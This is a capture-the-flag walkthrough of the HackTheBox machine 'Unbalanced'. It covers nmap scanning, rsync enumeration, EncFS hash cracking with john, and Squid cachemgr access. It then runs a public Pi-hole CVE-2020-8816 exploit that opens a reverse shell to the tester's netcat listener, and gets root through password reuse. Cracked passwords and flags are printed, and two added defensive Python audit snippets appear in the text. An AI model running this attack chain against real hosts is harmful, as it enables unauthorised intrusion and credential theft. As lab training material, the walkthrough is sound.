NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-07 12:49 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:49
Completed NSE at 12:49, 0.00s elapsed
Initiating NSE at 12:49
Completed NSE at 12:49, 0.00s elapsed
Initiating NSE at 12:49
Completed NSE at 12:49, 0.00s elapsed
Initiating Ping Scan at 12:49
Scanning 10.10.10.200 [4 ports]
Completed Ping Scan at 12:49, 0.48s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:49
Scanning intranet.unbalanced.htb (10.10.10.200) [1000 ports]
Discovered open port 22/tcp on 10.10.10.200
Discovered open port 873/tcp on 10.10.10.200
Discovered open port 3128/tcp on 10.10.10.200
Completed SYN Stealth Scan at 12:49, 13.69s elapsed (1000 total ports)
Initiating Service scan at 12:49
Scanning 3 services on intranet.unbalanced.htb (10.10.10.200)
Completed Service scan at 12:52, 198.68s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against intranet.unbalanced.htb (10.10.10.200)
adjust_timeouts2: packet supposedly had rtt of -943567 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -943567 microseconds. Ignoring time.
Retrying OS detection (try #2) against intranet.unbalanced.htb (10.10.10.200)
Initiating Traceroute at 12:53
Completed Traceroute at 12:53, 1.79s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 12:53
Completed Parallel DNS resolution of 2 hosts. at 12:53, 1.74s elapsed
NSE: Script scanning 10.10.10.200.
Initiating NSE at 12:53
Completed NSE at 12:53, 41.20s elapsed
Initiating NSE at 12:53
Completed NSE at 12:53, 4.36s elapsed
Initiating NSE at 12:53
Completed NSE at 12:53, 0.00s elapsed
Nmap scan report for intranet.unbalanced.htb (10.10.10.200)
Host is up (0.86s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 a2:76:5c:b0:88:6f:9e:62:e8:83:51:e7:cf:bf:2d:f2 (RSA)
| 256 d0:65:fb:f6:3e:11:b1:d6:e6:f7:5e:c0:15:0c:0a:77 (ECDSA)
|_ 256 5e:2b:93:59:1d:49:28:8d:43:2c:c1:f7:e3:37:0f:83 (ED25519)
100/tcp filtered newacct
541/tcp filtered uucp-rlogin
873/tcp open rsync?
1007/tcp filtered unknown
1022/tcp filtered exp2
1322/tcp filtered novation
2000/tcp filtered cisco-sccp
2040/tcp filtered lam
2160/tcp filtered apc-2160
2251/tcp filtered dif-port
3128/tcp open http-proxy Squid http proxy 4.6
|_http-server-header: squid/4.6
|_http-title: ERROR: The requested URL could not be retrieved
3546/tcp filtered unknown
3551/tcp filtered apcupsd
5510/tcp filtered secureidprop
6667/tcp filtered irc
7106/tcp filtered unknown
8089/tcp filtered unknown
8899/tcp filtered ospf-lite
9500/tcp filtered ismserver
32771/tcp filtered sometimes-rpc5
52869/tcp filtered unknown
54328/tcp filtered unknown
Aggressive OS guesses: Linux 2.6.32 (95%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 15.187 days (since Thu Jul 23 08:24:14 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 23/tcp)
HOP RTT ADDRESS
1 777.99 ms 10.10.14.1
2 778.17 ms intranet.unbalanced.htb (10.10.10.200)
NSE: Script Post-scanning.
Initiating NSE at 12:53
Completed NSE at 12:53, 0.00s elapsed
Initiating NSE at 12:53
Completed NSE at 12:53, 0.00s elapsed
Initiating NSE at 12:53
Completed NSE at 12:53, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 285.84 seconds
Raw packets sent: 1632 (75.040KB) | Rcvd: 1252 (63.479KB)
ADDING DOMAINS INTO /etc/hosts
unbalanced.htb
intranet.unbalanced.htb
Let's go to this domain first
Here we got nothing working so far!!!
ENUMERATING RSYNC PORT 873
LINK TO TAKE HELP FROM
https://medium.com/@minimalist.ascent/enumerating-rsync-servers-with-examples-cc3718e8e2c0
Getting the directories which we can access or sync
┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #rsync -rdt rsync://10.10.10.200:873
conf_backups    EncFS-encrypted configuration backups
Downloading and Enumerating Further
┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #rsync -rdt rsync://10.10.10.200:873/conf_backups conf_backups
┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #ls
conf_backups
┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #cd conf_backups/
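The rsync commands above list and copy the conf_backups module without any credentials. As an added example (not part of the original walkthrough), here is the server-side check for that condition: it parses an rsyncd.conf and reports modules that have no "auth users", no "hosts allow", or are advertised in listings. The sample config, its paths and the "internal" module are constructed for illustration.

```python
# Added example: flag rsync modules that anyone can list or read.
SAMPLE_CONF = """\
# constructed sample, not the target's real rsyncd.conf
uid = nobody

[conf_backups]
    path = /srv/backups/conf
    comment = EncFS-encrypted configuration backups

[internal]
    path = /srv/internal
    auth users = backup
    secrets file = /etc/rsyncd.secrets
    hosts allow = 10.0.0.0/8
    list = no
"""

def parse_rsyncd(text):
    """Return (global_params, {module: params}).
    rsyncd ignores whitespace inside parameter names, so 'auth users'
    becomes 'authusers'; names are also lower-cased here."""
    glob, modules, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = modules.setdefault(line[1:-1].strip(), {})
            continue
        if "=" not in line:
            continue
        name, value = line.split("=", 1)   # only the first '=' is significant
        key = "".join(name.split()).lower()
        (glob if current is None else current)[key] = value.strip()
    return glob, modules

def audit(text):
    """Map each exposed module name to a list of findings."""
    glob, modules = parse_rsyncd(text)
    findings = {}
    for mod, params in modules.items():
        eff = {**glob, **params}           # module settings override globals
        issues = []
        if not eff.get("authusers"):
            issues.append("anonymous access (no 'auth users')")
        if not eff.get("hostsallow"):
            issues.append("no 'hosts allow' restriction")
        if eff.get("list", "yes").lower() in ("yes", "true", "1"):
            issues.append("module is advertised in listings")
        if issues:
            findings[mod] = issues
    return findings

if __name__ == "__main__":
    for mod, issues in audit(SAMPLE_CONF).items():
        print(f"[{mod}]")
        for issue in issues:
            print("  -", issue)
```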
After googling, I came to know about a file named .encfs6.xml, where it stores the password for this decryption method
Here we got this file and password we got is this
We cannot directly search for and crack this because the hash is salted, so we need to use john
┌─[root@liquid]─[~/Desktop/HTB/unbalanced/conf_backups]
└──╼ #python /opt/metasploit/john/bin/encfs2john.py . > ../hash
┌─[root@liquid]─[~/Desktop/HTB/unbalanced/conf_backups]
└──╼ #cd ..
┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #ls
conf_backups  hash
┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #cat hash
.:$encfs$192*580280*0*20*99176a6e4d96c0b32bad9d4feb3d8e425165f105*44*1b2a580dea6cda1aedd96d0b72f43de132b239f51c224852030dfe8892da2cad329edc006815a3e84b887add
┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #
Cracking hash password
I have already cracked the password, so I'll be using the --show command
┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #locate encfs2john
/opt/metasploit/john/bin/encfs2john.py
/usr/share/john/encfs2john.py
┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #python /usr/share/john/encfs2john.py conf_backups/ > file.hash
┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #john --show file.hash
conf_backups/:bubblegum

1 password hash cracked, 0 left
Now we mount the files and enumerate through them; to decrypt the folder we need to mount it
https://linuxconfig.org/how-to-encrypt-directory-with-encfs-on-debian-9-stretch
┌─[root@liquid]─[~]
└──╼ #encfs ~/Desktop/HTB/unbalanced/conf_backups/ ~/decrypted-data/
EncFS Password:
┌─[root@liquid]─[~]
└──╼ #cd decrypted-data/
┌─[root@liquid]─[~/decrypted-data]
└──╼ #ls
50-localauthority.conf              hdparm.conf                      parser.conf
50-nullbackend.conf                 host.conf                        protect-links.conf
51-debian-sudo.conf                 initramfs.conf                   reportbug.conf
70debconf                           input.conf                       resolv.conf
99-sysctl.conf                      journald.conf                    resolved.conf
access.conf                         kernel-img.conf                  rsyncd.conf
adduser.conf                        ldap.conf                        rsyslog.conf
bluetooth.conf                      ld.so.conf                       semanage.conf
ca-certificates.conf                libaudit.conf                    sepermit.conf
com.ubuntu.SoftwareProperties.conf  libc.conf                        sleep.conf
dconf                               limits.conf                      squid.conf
debconf.conf                        listchanges.conf                 sysctl.conf
debian.conf                         logind.conf                      system.conf
deluser.conf                        logrotate.conf                   time.conf
dhclient.conf                       main.conf                        timesyncd.conf
discover-modprobe.conf              mke2fs.conf                      ucf.conf
dkms.conf                           modules.conf                     udev.conf
dns.conf                            namespace.conf                   update-initramfs.conf
dnsmasq.conf                        network.conf                     user.conf
docker.conf                         networkd.conf                    user-dirs.conf
fakeroot-x86_64-linux-gnu.conf      nsswitch.conf                    Vendor.conf
framework.conf                      org.freedesktop.PackageKit.conf  wpa_supplicant.conf
fuse.conf                           PackageKit.conf                  x86_64-linux-gnu.conf
gai.conf                            pam.conf                         xattr.conf
group.conf                          pam_env.conf
Here we check squid.conf, since the Squid port is open
Data we found in that file
So here we got some IP and pass which we will be using as below
Now if we google cachemgr_passwd we get a number of links, but the helpful one, which I used, is this
After going through this we will be checking out this command
┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:fqdncache
Here it will give cache stats as in memcache stats
┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:fqdncache
HTTP/1.1 200 OK
Server: squid/4.6
Mime-Version: 1.0
Date: Sat, 08 Aug 2020 17:50:41 GMT
Content-Type: text/plain;charset=utf-8
Expires: Sat, 08 Aug 2020 17:50:41 GMT
Last-Modified: Sat, 08 Aug 2020 17:50:41 GMT
X-Cache: MISS from unbalanced
X-Cache-Lookup: MISS from unbalanced:3128
Via: 1.1 unbalanced (squid/4.6)
Connection: close

FQDN Cache Statistics:
FQDNcache Entries In Use: 19
FQDNcache Entries Cached: 14
FQDNcache Requests: 25674
FQDNcache Hits: 0
FQDNcache Negative Hits: 13844
FQDNcache Misses: 11830
FQDN Cache Contents:

Address         Flg  TTL     Cnt  Hostnames
10.10.14.154    N    055     0
127.0.1.1       H    -001    2    unbalanced.htb unbalanced
::1             H    -001    3    localhost ip6-localhost ip6-loopback
172.31.179.2    H    -001    1    intranet-host2.unbalanced.htb
172.31.179.3    H    -001    1    intranet-host3.unbalanced.htb
10.10.10.200    N    -15303  0
127.0.0.1       H    -001    1    localhost
172.17.0.1      H    -001    1    intranet.unbalanced.htb
ff02::1         H    -001    1    ip6-allnodes
ff02::2         H    -001    1    ip6-allrouters
10.10.16.8      N    -49408  0
10.10.14.110    N    -4338   0
10.10.14.69     N    -9212   0
10.10.16.85     N    -2885   0
BEFORE GOING THROUGH ANY PAGE, ADD THIS MACHINE'S IP AND SQUID PROXY PORT TO YOUR PROXY SETUP: THE IP IS 10.10.10.200 AND THE PORT IS 3128, JUST AS WE DO FOR BURP, WHERE WE SET IT TO 127.0.0.1 AND PORT 8080
Here we got 2 IPs under the same domain that we found in the nmap results
LOGIN TO WEBPAGE
Here we will be using SQL injection login commands
Here we go with some users here :
Let's create a list of these users and try to generate passwords for them
Passwords which we got are !!
Here I had to take help from someone to get this done, but did this 🙂
bryan :: ireallyl0vebubblegum!!!
GETTING USER ACCESS
bryan :: ireallyl0vebubblegum!!!
┌─[✗]─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #ssh bryan@10.10.10.200
bryan@10.10.10.200's password:
Linux unbalanced 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Aug 8 13:12:09 2020 from 10.10.15.58
bryan@unbalanced:~$ id
uid=1000(bryan) gid=1000(bryan) groups=1000(bryan)
bryan@unbalanced:~$ cat user.txt
12840aaf879e39d87975c0e927539458
bryan@unbalanced:~$
Here we have another file also named TODO
bryan@unbalanced:~$ cat TODO
############
# Intranet #
############
* Install new intranet-host3 docker [DONE]
* Rewrite the intranet-host3 code to fix Xpath vulnerability [DONE]
* Test intranet-host3 [DONE]
* Add intranet-host3 to load balancer [DONE]
* Take down intranet-host1 and intranet-host2 from load balancer (set as quiescent, weight zero) [DONE]
* Fix intranet-host2 [DONE]
* Re-add intranet-host2 to load balancer (set default weight) [DONE]
- Fix intranet-host1 [TODO]
- Re-add intranet-host1 to load balancer (set default weight) [TODO]

###########
# Pi-hole #
###########
* Install Pi-hole docker (only listening on 127.0.0.1) [DONE]
* Set temporary admin password [DONE]
* Create Pi-hole configuration script [IN PROGRESS]
- Run Pi-hole configuration script [TODO]
- Expose Pi-hole ports to the network [TODO]
bryan@unbalanced:~$
So I tried LinPEAS but got nothing
So I went to check netstat, which was not installed, but we have an alternative for that
https://staaldraad.github.io/2017/12/20/netstat-without-netstat/
bryan@unbalanced:~$ awk 'function hextodec(str,ret,n,i,k,c){
>     ret = 0
>     n = length(str)
>     for (i = 1; i <= n; i++) {
>         c = tolower(substr(str, i, 1))
>         k = index("123456789abcdef", c)
>         ret = ret * 16 + k
>     }
>     return ret
> }
> function getIP(str,ret){
>     ret=hextodec(substr(str,index(str,":")-2,2));
>     for (i=5; i>0; i-=2) {
>         ret = ret"."hextodec(substr(str,i,2))
>     }
>     ret = ret":"hextodec(substr(str,index(str,":")+1,4))
>     return ret
> }
> NR > 1 {{if(NR==2)print "Local - Remote";local=getIP($2);remote=getIP($3)}{print local" - "remote}}' /proc/net/tcp
Local - Remote
0.0.0.0:873 - 0.0.0.0:0
127.0.0.1:8080 - 0.0.0.0:0
127.0.0.1:5553 - 0.0.0.0:0
0.0.0.0:53 - 0.0.0.0:0
0.0.0.0:22 - 0.0.0.0:0
10.10.10.200:22 - 10.10.14.149:54896
10.10.10.200:22 - 10.10.14.132:40326
10.10.10.200:22 - 10.10.15.58:58698
127.0.0.1:8080 - 127.0.0.1:43034
172.31.0.1:43408 - 172.31.11.3:80
127.0.0.1:43034 - 127.0.0.1:8080
10.10.10.200:22 - 10.10.14.154:46330
bryan@unbalanced:~$
Here we find two more open ports: 8080 and 5553
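The awk one-liner prints every socket, listening or connected, and the two loopback services have to be picked out by eye. As an added example (not from the original post or the linked article), this is the same /proc/net/tcp decoding in Python, keeping only sockets in LISTEN state and labelling how each one is bound. The sample table is constructed, and little-endian byte order (x86) is assumed.

```python
import socket
import struct

TCP_LISTEN = "0A"  # value of the 'st' column for a listening socket

# Constructed sample in /proc/net/tcp layout (trailing columns trimmed).
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue
   0: 00000000:0369 00000000:0000 0A 00000000:00000000
   1: 0100007F:1F90 00000000:0000 0A 00000000:00000000
   2: 0100007F:15B1 00000000:0000 0A 00000000:00000000
   3: C80A0A0A:0016 840E0A0A:9D86 01 00000000:00000000
"""

def decode_endpoint(field):
    """'0100007F:1F90' -> ('127.0.0.1', 8080). Assumes a little-endian host."""
    hex_ip, hex_port = field.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(hex_ip, 16)))
    return ip, int(hex_port, 16)

def bind_scope(ip):
    """Describe who can reach a listener bound to this address."""
    if ip == "0.0.0.0":
        return "all interfaces"
    if ip.startswith("127."):
        return "loopback only"
    return "single address"

def listeners(table):
    """Return sorted (port, ip, scope) tuples for sockets in LISTEN state."""
    found = []
    for line in table.splitlines()[1:]:       # skip the header row
        cols = line.split()
        if len(cols) < 4 or cols[3] != TCP_LISTEN:
            continue                           # established, time-wait, ...
        ip, port = decode_endpoint(cols[1])
        found.append((port, ip, bind_scope(ip)))
    return sorted(found)

if __name__ == "__main__":
    try:
        with open("/proc/net/tcp") as fh:
            table = fh.read()
    except OSError:
        table = SAMPLE                         # not on Linux: use the sample
    for port, ip, scope in listeners(table):
        print(f"{ip}:{port:<6} {scope}")
```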
Let's go for enumeration of these ports
bryan@unbalanced:~$ curl http://127.0.0.1:5553
^C
bryan@unbalanced:~$ curl http://127.0.0.1:8080
[ERROR]: Unable to parse results from <i>queryads.php</i>: <code>Unhandled error message (<code>Invalid domain!</code>)</code>
Here I got 0 results, but port 8080 was asking for a domain!
bryan@unbalanced:~$ curl http://127.0.0.1:8080 -H 'Host: unbalanced'
<!DOCTYPE html>
<!-- Pi-hole: A black hole for Internet advertisements
* (c) 2017 Pi-hole, LLC (https://pi-hole.net)
* Network-wide ad blocking via your own hardware.
*
* This file is copyright under the latest version of the EUPL. -->
<----->
<input id="bpWLPassword" type="password" placeholder="Javascript disabled" disabled/><button id="bpWhitelist" type="button" disabled></button>
</form>
</div>
</main>
<footer><span>Saturday 6:12 PM, August 08th.</span> Pi-hole v4.3.2-0-ge41c4b5 (pihole.unbalanced.htb/172.31.11.3)</footer>
</div>
<script>
function add() {
$("#bpOutput").removeClass("hidden error exception");
$("#bpOutput").addClass("add");
var domain = "unbalanced";
var pw = $("#bpWLPassword");
<----->
Here we got an IP with Pi-hole running on it, version 4.3.2, which is vulnerable to RCE
SO let's Get That Shit done!! As we are given some steps in the TODO list >>
So script we will be using is this :
https://github.com/AndreyRainchik/CVE-2020-8816/blob/master/CVE-2020-8816.py
To make it work we need to run these commands from our own machine, so we have to port forward 8080 to our machine
┌─[✗]─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #ssh -NL 8080:127.0.0.1:8080 bryan@10.10.10.200
bryan@10.10.10.200's password:
Here we port forwarded this so lets run our script :
┌─[✗]─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #python3 exploitpihole.py http://127.0.0.1:8080 admin 10.10.14.132 9001
Attempting to verify if Pi-hole version is vulnerable
Logging in...
Login succeeded
Grabbing CSRF token
Attempting to read $PATH
Pihole is vulnerable and served's $PATH allows PHP
Sending payload
LISTENING ON PORT
┌─[✗]─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.132] from (UNKNOWN) [10.10.10.200] 47558
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd
/var/www/html/admin
$ hostname
pihole.unbalanced.htb
$
GETTING ROOT ACCESS
Here I was able to read the files in the root directory of this host
$ cd /root
pwd
$ /root
$ pwd
/root
$ ls
ph_install.sh
pihole_config.sh
$ cat pihole_config.sh
#!/bin/bash

# Add domains to whitelist
/usr/local/bin/pihole -w unbalanced.htb
/usr/local/bin/pihole -w rebalanced.htb

# Set temperature unit to Celsius
/usr/local/bin/pihole -a -c

# Add local host record
/usr/local/bin/pihole -a hostrecord pihole.unbalanced.htb 127.0.0.1

# Set privacy level
/usr/local/bin/pihole -a -l 4

# Set web admin interface password
/usr/local/bin/pihole -a -p 'bUbBl3gUm$43v3Ry0n3!'

# Set admin email
/usr/local/bin/pihole -a email admin@unbalanced.htb
$
Here I got another password, so I just tried to use this for root and it worked
┌─[✗]─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #ssh bryan@10.10.10.200
bryan@10.10.10.200's password:
Linux unbalanced 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Aug 8 14:04:13 2020 from 10.10.14.132
bryan@unbalanced:~$ id
uid=1000(bryan) gid=1000(bryan) groups=1000(bryan)
bryan@unbalanced:~$ su root
Password:
root@unbalanced:/home/bryan# id
uid=0(root) gid=0(root) groups=0(root)
root@unbalanced:/home/bryan# cd /root
root@unbalanced:~# ls
root.txt
root@unbalanced:~# cat root.txt
a00801226119423990cecfe56f7b39c1
root@unbalanced:~#
Here we go with our root flag!!
This machine was difficult for me during SQUID PROXY part
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE